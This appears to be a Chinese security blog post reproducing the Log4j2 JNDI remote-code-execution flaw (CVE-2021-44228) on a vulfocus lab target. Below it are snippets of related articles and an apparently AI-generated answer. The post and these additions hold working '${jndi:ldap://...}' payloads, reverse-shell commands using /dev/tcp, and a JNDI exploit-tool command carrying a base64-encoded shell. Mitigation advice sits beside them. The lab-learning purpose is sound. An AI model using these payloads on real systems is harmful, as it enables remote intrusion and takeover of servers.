用vulfocus靶场环境复现Log4j2远程命令执行漏洞

最新推荐文章于 2025-04-16 21:05:32 发布
原创 最新推荐文章于 2025-04-16 21:05:32 发布 · 3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #java #log4j2 #远程命令执行

声明:文章所提供的内容和工具仅供于个人学习和研究,严禁传播者利用本文章的相关内容进行非法测试。由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

用vulfocus启动一个靶场环境,Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。
在这里插入图片描述

提示当前环境测试url:http://xxxxx/hello post参数为:payload=xxxxx
访问:http://vulfocus.fofa.so:35273/
在这里插入图片描述

扫描后台发现/error、/index.php、/hello
分别访问:
http://vulfocus.fofa.so:35273/error
在这里插入图片描述

http://vulfocus.fofa.so:35273/index.php
在这里插入图片描述

http://vulfocus.fofa.so:35273/hello
在这里插入图片描述

提示:不支持请求方法“GET”

我们可以用burpsuite或者火狐浏览器拦截编辑发送的数据包,这里我们只是简单利用就直接用火狐浏览器演示一下:
在这里插入图片描述

将数据提交方式改为POST,在请求主体中随便写点内容
在这里插入图片描述

发送:
在这里插入图片描述
在这里插入图片描述

返回OK提示我们能够成功发送数据包
再编辑重发,注意要加一个Content-Type: application/x-www-form-urlencoded:
构造payload="${jndi:ldap://987r84.dnslog.cn/exp}"
在这里插入图片描述

之后查看http://www.dnslog.cn/的987r84.dnslog.cn:
在这里插入图片描述

有对应的攻击记录,证明存在漏洞。
也可以在本地搭建运行JNDI服务,实现远程任意命令执行。

文章所提供的内容和工具仅供于个人学习和研究,严禁传播者利用本文章的相关内容进行非法测试。

apache log4j2vulfocus靶场漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-21 1528
Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。apache log4j2vulfocus靶场漏洞复现,随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228 一、环境搭建-vulfocus靶场,本次漏洞复现采用vulfocuslog4j2靶场docker,使用Kali系统进行复现实验。
vulfocus复现Log4j2远程命令执行(CVE-2021-44228)
m0_71518346的博客
12-17 1017
富的特性。该日志框架被大量用于业务Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰系统开发,用来记录日志信息。在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。
通过vulfocus靶场--复现log4j2漏洞
weixin_55843787的博客
05-11 3709
vulfocus靶场log4j2漏洞复现
vulfocus复现Log4j2远程命令执行2
woai_zhongguo的博客
07-15 948
Log4j2远程命令执行2复现过程
Vulfocus漏洞复现log4j2-cve-2021-44228
weixin_45632448的博客
04-13 4171
vps:centos8 腾讯云 本地:windows11 靶场环境:http://123.58.236.76:64936/ 访问靶场环境http://123.58.236.76:64936/ 点击??? burp抓包,DNSlog验证漏洞是否存在 构造payload=${jndi:ldap://7272sq.ceye.io},并在burp中请求数据,返回400 payload=${jndi:ldap://7272sq.ceye.io} 对payload进行url编码(burp自带),再次进行请求,
2022年12月最新)最详细vulfocus靶场 Log4j2远程命令执行漏洞复现
qq1140037586的博客
12-15 1312
1、向目标发送指定payload,目标对payload进行解析执行,然后会通过ldap链接远程服务,当ldap服务收到请求之后,将请求进行重定向到恶意 java class的地址。 2、目标服务器收到重定向请求之后,下载恶意class并执行其中的代码,从而执行系统命令。
vulfocus.fofa靶场Log4j2远程命令执行2
weixin_48817799的博客
12-29 5195
vulfocus.fofa靶场Log4j2远程命令执行2前言一、靶场复现总结 前言 名称: ghcr.io/christophetd/log4shell-vulnerable-app:latest 描述: log4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段 一、靶场复现 工具:JNDIExploit-1.3-SNAPSHOT.jar 1.打开靶场http://vulfocus.fofa.so 2.使用vps启动工具 java -jar JNDIExploit-1.3.
log4j2远程代码执行漏洞复现
qq_42194976的博客
07-12 1161
log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。这样如果不对lookup的出栈进行限制,就有可能让查询指向任何服务(可能是攻击者部署好的恶意代码)。攻击者可以利用这一点进行JNDI注入,使得受害者请求远程服务来链接本地对象,在lookup的{}里面构造payload,调用JNDI服务(LDAP)向攻击者提前部署好的恶意站点获取恶意的.class对象,造成了远程代码执行(可反弹shell到指定服务器)。
log4j2远程执行代码CVE-2021-44228复现vulfocus靶场
m0_74294234的博客
03-31 503
bash -i >& /dev/tcp/(你服务器的公网IP地址)/8888(监听的端口号,我这里使用的是8888端口) 0>&1。1:首先打开finalshell或其他本地服务器上传,先创建一个ddd文件夹,并把下载的工具转移到该目录。}|{base64,-d}|{bash,-i}" -A "(你服务器的公网IP地址)"5:打开另一个终端端口并开启监听8888端口(8888端口是你在前面设置的监听端口)这样子就成功监听到端口,先进入tmp目录下,在输入ls可以爆出flag;6:用burpsuite抓包。
vulfocus-fofa靶场 Log4j2远程命令执行
weixin_48817799的博客
12-29 4429
Log4j2远程命令执行前言一、Apache Log4j2是什么?二、复现步骤1.工具2.复现过程 前言 一、Apache Log4j2是什么? Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 二、复现步骤 1.工具 工具:JNDI-Inje
log4j2漏洞原理分析及复现-CVE-2021-44228 (vulfocus靶场
yang1234567898的博客
04-18 3387
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
Log4j2远程命令执行2-vulfocus-wp
miojjnum的博客
12-22 3862
vulfocuslog4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段 1、首先准备一个vps环境(腾讯云阿里云都可) 在vps上开启ldap环境: 输入命令开启监听: java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 你的vps的IP地址 -l 7000 -p 5000 2、bp抓包伺候 ...
Log4j2远程命令执行(CVE-2021-44228)
m0_57780106的博客
09-18 147
Log4j2 远程命令执行(CVE-2021-44228)漏洞复现
CVE-2021-44228——Log4j2-RCE漏洞复现
「 虚幻私塾」
01-20 780
Python微信订餐小程序课程视频 https://edu.youkuaiyun.com/course/detail/36074 Python实战量化交易理财系统 https://edu.youkuaiyun.com/course/detail/35475 0x00 漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.22.12.3 和 2.3
Apache Log4j2 远程代码执行
qq_43679531的博客
01-21 3258
iptables -I INPUT -p tcp --dport 9999 -j ACCEPT iptables -I INPUT -p tcp --dport 1099 -j ACCEPT iptables -I INPUT -p tcp --dport 8180 -j ACCEPT iptables -I INPUT -p tcp --dport 1389 -j ACCEPT 工具 链接:百度网盘 请输入提取码 提取码:6ldj java -jar JNDI-Injectio..
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
heike_Ch的博客
08-14 3202
log4j22021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞的原理及利用方式。如何排查是否受到了攻击?检查日志中是否存在"jndi:ldap://"、"jndi:rmi//"等字符来发现可能的攻击行为,前面复现的过程在payload的构造中都出现了这样的字符串,这是攻击的典型标志。如何对log4j2的攻击进行防御?1.设置log4j2.formatMsgNoLookups=True。
Log4j2远程命令执行(CVE-2021-44228)复现
最新发布
hp.puppy的博客
04-16 1116
Log4j2远程命令执行(CVE-2021-44228)复现 JNDI 注入工具安装与使用
【网络安全---漏洞复现log4j2漏洞详细的复现和利用过程(CVE-2021-44228)
m0_67844671的博客
09-10 4105
Log4j2远程代码执行漏洞复现(cve-2021-44228),漏洞复现详细过程,cve-2021-44228,Log4j2
Apache Log4j2 Vulfocus靶场环境复现
Aevery的博客
12-12 3740
Vulfocus在线靶场免费注册免费使用。在线地址: vulfocus 点击启动环境 启动后访问页面显示地地址,能成功访问即完成搭建完成 这里使用chrome的HackBar插件,直接使用POST协议随便传个参数上去访问hello页面 直接在Body插入payload,这里使用dnslog payload="${jndi:ldap://asr17t.dnslog.cn/exp}" 成功打印出dnslog信息 反弹shell替换payload即可 PS:...
极核靶场Log4j2 - 远程代码执行
03-25
<think>好的,用户想了解关于极核靶场Log4j2远程代码执行漏洞的信息和解决方案。首先,我需要回忆一下Log4j2漏洞的基本情况。Log4j2的这个漏洞(CVE-2021-44228)是一个非常严重的远程代码执行漏洞,影响广泛,因为它允许攻击者通过构造特定的日志消息触发远程代码执行。极核靶场可能是一个用于安全演练的环境,用户可能在复现或测试这个漏洞时需要解决方案。 接下来,用户提到的极核靶场,可能是一个模拟环境,用于漏洞复现和渗透测试。所以解决方案可能需要包括漏洞复现步骤、修复方法以及相关的防护措施。需要确保给出的步骤准确,并且适用于靶场环境,可能涉及到的工具或配置需要具体说明。 然后,我需要参考提供的引用资料。引用[1]、[2]、[4]都涉及到Log4j2漏洞的官方修复和详细分析,特别是引用[4]中的GitHub仓库可能有复现的步骤和检测方法。而引用[3]提到的HTTP.sys漏洞虽然相关,但可能不直接适用,不过可以作为远程执行漏洞的参考案例。 用户的问题可能包括如何复现漏洞、如何检测是否存在漏洞,以及如何修复。因此,回答需要结构清晰,分点说明漏洞原理、复现步骤、解决方案、加固建议等。同时,根据系统级指令,需要正确使用LaTeX格式,不过这个漏洞相关的内容可能数学公式较少,但如果有的话要正确应用。 此外,用户可能希望得到具体的操作指南,比如升级到哪个版本,如何配置环境变量来缓解漏洞,或者使用工具进行检测。需要确保这些步骤在极核靶场环境中是可行的,可能需要提及常用的工具如scanner、JNDI注入工具等。 最后,生成相关问题需要考虑用户可能的后续疑问,比如漏洞原理、其他相关漏洞、如何预防类似问题等。需要确保问题具有连贯性和扩展性,帮助用户深入理解。</think>### Log4j2远程代码执行漏洞在极核靶场的解决方案 #### 1. 漏洞原理 该漏洞源于Log4j2的`JNDI`功能未对输入内容进行安全过滤。攻击者可通过构造包含恶意`${jndi:ldap://attacker.com/exp}`格式的日志信息触发远程代码加载,例如在HTTP请求头、用户输入等场景注入恶意载荷[^1][^4]。漏洞触发条件满足时,靶场环境会通过`lookup`功能执行远程代码。 #### 2. 漏洞复现步骤(极核靶场环境) ```bash # 使用JNDI注入工具生成恶意LDAP服务 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS80NDMgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.1.1 # 向靶场发送包含恶意载荷的请求 curl -H "User-Agent: \${jndi:ldap://attacker-ip:1389/exp}" http://target-ip:8080/vulnerable-endpoint ``` #### 3. 解决方案 **(1) 官方修复方案** - 升级至Log4j2 2.15.0及以上版本[^1] - 若无法立即升级,可通过以下方式缓解: ```bash # 添加JVM启动参数 -Dlog4j2.formatMsgNoLookups=true # 或设置环境变量 LOG4J_FORMAT_MSG_NO_LOOKUPS=true ``` **(2) 靶场环境加固** - 使用WAF拦截包含`${jndi:}`模式的请求 - 限制靶场服务器外连网络(白名单策略) - 部署RASP(运行时应用自我保护)监测异常JNDI调用 #### 4. 检测方法 ```bash # 使用专用扫描工具验证 python3 log4j-scan.py -u http://target-ip --check-vuln ``` #### 5. 影响范围 - 使用Log4j2 2.0-beta9至2.14.1版本的Java应用[^2] - 涉及Spring Boot、Apache Solr等常见框架的靶场实验环境
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值